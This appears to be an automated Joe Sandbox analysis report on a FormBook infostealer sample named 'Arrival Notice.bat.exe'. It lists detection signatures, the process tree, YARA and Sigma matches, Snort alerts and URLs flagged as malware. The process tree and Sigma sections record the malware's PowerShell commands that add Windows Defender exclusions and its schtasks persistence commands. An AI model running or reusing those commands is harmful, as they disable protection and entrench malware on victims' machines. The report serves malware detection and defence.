Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Arrival Notice.bat.exe

Overview

General Information

Sample name:Arrival Notice.bat.exe
Analysis ID:1459718
MD5:615f92f0ecef4eb70de1c52cee091948
SHA1:8213ac015b088c484e7fff3317e4e32d91b933cf
SHA256:48dcd87fc8e5dca5caa5788ee49d6cbdf1f8c76f789b2fd619665a07af9b5c57
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Arrival Notice.bat.exe (PID: 6712 cmdline: "C:\Users\user\Desktop\Arrival Notice.bat.exe" MD5: 615F92F0ECEF4EB70DE1C52CEE091948)
    • powershell.exe (PID: 7172 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7220 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dLrZsz.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7572 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7276 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Arrival Notice.bat.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\Arrival Notice.bat.exe" MD5: 615F92F0ECEF4EB70DE1C52CEE091948)
      • WRrRgOfpwFEFXfaWUCsdTxK.exe (PID: 352 cmdline: "C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • compact.exe (PID: 8036 cmdline: "C:\Windows\SysWOW64\compact.exe" MD5: 5CB107F69062D6D387F4F7A14737220E)
          • WRrRgOfpwFEFXfaWUCsdTxK.exe (PID: 5740 cmdline: "C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7332 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
          • -6qxw.exe (PID: 7772 cmdline: "C:\Users\user\AppData\Local\Temp\-6qxw.exe" MD5: BD0CF4524C08026BA27005393E1F93A9)
            • -6qxw.exe (PID: 3164 cmdline: "C:\Users\user\AppData\Local\Temp\-6qxw.exe" MD5: BD0CF4524C08026BA27005393E1F93A9)
            • -6qxw.exe (PID: 2700 cmdline: "C:\Users\user\AppData\Local\Temp\-6qxw.exe" MD5: BD0CF4524C08026BA27005393E1F93A9)
              • WRrRgOfpwFEFXfaWUCsdTxK.exe (PID: 5812 cmdline: "C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • runonce.exe (PID: 6680 cmdline: "C:\Windows\SysWOW64\runonce.exe" MD5: 9E16655119DDE1B24A741C4FD4AD08FC)
                  • WRrRgOfpwFEFXfaWUCsdTxK.exe (PID: 1860 cmdline: "C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                  • firefox.exe (PID: 7668 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • dLrZsz.exe (PID: 7468 cmdline: C:\Users\user\AppData\Roaming\dLrZsz.exe MD5: 615F92F0ECEF4EB70DE1C52CEE091948)
    • schtasks.exe (PID: 7712 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmpEFDB.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dLrZsz.exe (PID: 7756 cmdline: "C:\Users\user\AppData\Roaming\dLrZsz.exe" MD5: 615F92F0ECEF4EB70DE1C52CEE091948)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000018.00000002.3466776622.00000000010B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000018.00000002.3466776622.00000000010B0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2aef0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x144bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000001A.00000002.4145607762.0000000000D10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000001A.00000002.4145607762.0000000000D10000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2aef0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x144bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.2005620217.00000000018D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 30 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        8.2.Arrival Notice.bat.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          8.2.Arrival Notice.bat.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d2b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16812:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          8.2.Arrival Notice.bat.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            8.2.Arrival Notice.bat.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e0b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17612:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            24.2.-6qxw.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              Click to see the 3 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice.bat.exe", ParentImage: C:\Users\user\Desktop\Arrival Notice.bat.exe, ParentProcessId: 6712, ParentProcessName: Arrival Notice.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe", ProcessId: 7172, ProcessName: powershell.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice.bat.exe", ParentImage: C:\Users\user\Desktop\Arrival Notice.bat.exe, ParentProcessId: 6712, ParentProcessName: Arrival Notice.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe", ProcessId: 7172, ProcessName: powershell.exe
              Sigma detected: Suspicious Add Scheduled Task Parent
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmpEFDB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmpEFDB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\dLrZsz.exe, ParentImage: C:\Users\user\AppData\Roaming\dLrZsz.exe, ParentProcessId: 7468, ParentProcessName: dLrZsz.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmpEFDB.tmp", ProcessId: 7712, ProcessName: schtasks.exe
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice.bat.exe", ParentImage: C:\Users\user\Desktop\Arrival Notice.bat.exe, ParentProcessId: 6712, ParentProcessName: Arrival Notice.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp", ProcessId: 7276, ProcessName: schtasks.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice.bat.exe", ParentImage: C:\Users\user\Desktop\Arrival Notice.bat.exe, ParentProcessId: 6712, ParentProcessName: Arrival Notice.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe", ProcessId: 7172, ProcessName: powershell.exe

              Persistence and Installation Behavior

              barindex
              Sigma detected: Scheduled temp file as task from temp location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice.bat.exe", ParentImage: C:\Users\user\Desktop\Arrival Notice.bat.exe, ParentProcessId: 6712, ParentProcessName: Arrival Notice.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp", ProcessId: 7276, ProcessName: schtasks.exe

              Snort Signatures

              Timestamp:06/19/24-22:42:10.202163
              SID:2844299
              Source Port:49802
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:39:33.405537
              SID:2844299
              Source Port:49754
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:40:07.849802
              SID:2844299
              Source Port:49761
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:40:42.779245
              SID:2855465
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:39:45.830045
              SID:2844299
              Source Port:49757
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:40:17.162129
              SID:2844299
              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:40:23.998195
              SID:2844299
              Source Port:49767
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:40:35.180716
              SID:2844299
              Source Port:49770
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:42:08.294897
              SID:2855464
              Source Port:49801
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:39:53.502045
              SID:2844299
              Source Port:49760
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:40:15.470191
              SID:2855465
              Source Port:49764
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:48.016075
              SID:2844299
              Source Port:49792
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:40:42.779245
              SID:2844299
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:53.074822
              SID:2855465
              Source Port:49795
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:40:15.470191
              SID:2844299
              Source Port:49764
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:40:59.152934
              SID:2844299
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:37.810060
              SID:2855465
              Source Port:49789
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:09.959658
              SID:2844299
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:38:48.022806
              SID:2844299
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:40:29.074365
              SID:2855465
              Source Port:49769
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:51.953723
              SID:2855464
              Source Port:49794
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:39:48.363131
              SID:2844299
              Source Port:49758
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:12.502188
              SID:2844299
              Source Port:49779
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:40:29.074365
              SID:2844299
              Source Port:49769
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:40:56.623074
              SID:2844299
              Source Port:49774
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:39:30.874203
              SID:2844299
              Source Port:49753
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:32.734377
              SID:2855464
              Source Port:49785
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:38:48.022806
              SID:2855465
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:34.315743
              SID:2844299
              Source Port:49786
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:39:53.502045
              SID:2855465
              Source Port:49760
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:59.543505
              SID:2855465
              Source Port:49798
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:13.738083
              SID:2855465
              Source Port:49780
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:42:05.756419
              SID:2855464
              Source Port:49799
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:39:19.761339
              SID:2844299
              Source Port:49750
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:39:11.624328
              SID:2855465
              Source Port:49748
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:39:03.970093
              SID:2844299
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:39:11.624328
              SID:2844299
              Source Port:49748
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:31.772403
              SID:2844299
              Source Port:49784
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:45.471658
              SID:2844299
              Source Port:49791
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:40:37.720072
              SID:2844299
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:39:17.228084
              SID:2844299
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:30.198083
              SID:2855464
              Source Port:49783
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:39:24.826581
              SID:2844299
              Source Port:49752
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:39:38.488834
              SID:2844299
              Source Port:49756
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:40:10.387191
              SID:2844299
              Source Port:49762
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:39:06.525913
              SID:2844299
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:39:24.826581
              SID:2855465
              Source Port:49752
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:42:07.668525
              SID:2844299
              Source Port:49800
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:04.218070
              SID:2844299
              Source Port:49777
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:17.565460
              SID:2855465
              Source Port:49782
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:39.388327
              SID:2844299
              Source Port:49790
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:40:21.462056
              SID:2844299
              Source Port:49766
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:53.074822
              SID:2844299
              Source Port:49795
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:54.484353
              SID:2855464
              Source Port:49796
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:39:38.488834
              SID:2855465
              Source Port:49756
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:17.565460
              SID:2844299
              Source Port:49782
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:04.218070
              SID:2855465
              Source Port:49777
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/19/24-22:41:39.388327
              SID:2855465
              Source Port:49790
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://shahaf3d.com/wp-admin/admin-ajax.phpAvira URL Cloud: Label: malware
              Source: http://www.931951.com/2ha1/Avira URL Cloud: Label: malware
              Source: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.cssAvira URL Cloud: Label: malware
              Source: http://www.shahaf3d.com/0a9p/Avira URL Cloud: Label: malware
              Source: http://www.931951.com/2ha1/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=r6q+x3A/FEQLw6gnIIDKqn7cXK90QEz4MeLNvFaSJRcJ7hS0Yil9+YspC9bp8TGkQ6fd6C5Pq3eWOBjFGqN2KETivrZrq09Pe+ZYF4dhJGLDVCdvvTj0Vf0=Avira URL Cloud: Label: malware
              Source: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1.Avira URL Cloud: Label: malware
              Source: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2Avira URL Cloud: Label: malware
              Source: https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpgAvira URL Cloud: Label: malware
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\OdR8akYyHwr3ISR[1].exeReversingLabs: Detection: 62%
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeReversingLabs: Detection: 62%
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeReversingLabs: Detection: 26%
              Multi AV Scanner detection for submitted file
              Source: Arrival Notice.bat.exeReversingLabs: Detection: 26%
              Yara detected FormBook
              Source: Yara matchFile source: 8.2.Arrival Notice.bat.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.Arrival Notice.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.-6qxw.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.-6qxw.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000018.00000002.3466776622.00000000010B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.4145607762.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2005620217.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.4145710569.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.4147800420.0000000005740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4145840212.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.4147461137.0000000004FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.3464254438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4145942819.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.3470248065.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.4143217663.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4143205366.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2005850600.0000000002410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.4145476325.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.4145544196.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
